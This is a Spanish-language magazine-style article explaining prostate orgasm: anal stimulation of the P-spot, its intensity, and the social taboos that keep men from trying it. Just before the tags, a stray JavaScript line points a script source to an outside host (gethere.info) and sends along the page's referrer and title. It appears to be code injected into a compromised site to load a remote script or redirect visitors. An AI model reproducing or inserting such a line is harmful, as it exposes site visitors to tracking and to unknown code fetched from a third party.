¿Existe el orgasmo prostático?

Por Elizabeth Palacios [email protected]__palacios

El orgasmo prostático es una experiencia sexual, en muchos casos, tabú para muchos hombres, aún en la actualidad.

 

Suele ser percibida como una actividad sexual meramente de homosexuales, ya que la estimulación prostática debe ser por la vía anal.

Los orgasmos conseguidos a través de la estimulación prostática suelen ser más potentes de los normalmente experimentados por los hombres.

El orgasmo prostático es una experiencia diferente y asombrosa a la vez, quienes lo han experimentado, aseguran que es una sensación interior que, después sale al exterior, algo así como el orgasmo femenino.

Es importante que sepas que el orgasmo prostático no siempre va acompañado de eyaculación, aunque en ocasiones si se presenta.

Para conseguir un orgasmo prostático es necesaria la introducción anal, ya sea manual, genital  o con juguetes sexuales, para estimular el punto P.

El hombre es quien es penetrado en esta práctica sexual, es por esto que, muchos deciden jamás experimentar esta sensación por vivir rodeados de muchos tabúes inculcados desde pequeños.

El orgasmo prostático es una experiencia que debes vivir, algo que no te convierte en homosexual ni tiene que ser entre puros hombres.

Las mujeres también debemos estar abiertas a realizar actividades diferentes con nuestras parejas y hacerlos sentir en confianza para que se decidan a vivir su sexualidad sin etiquetas ni juicios de valor ni reproches.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||
Comentarios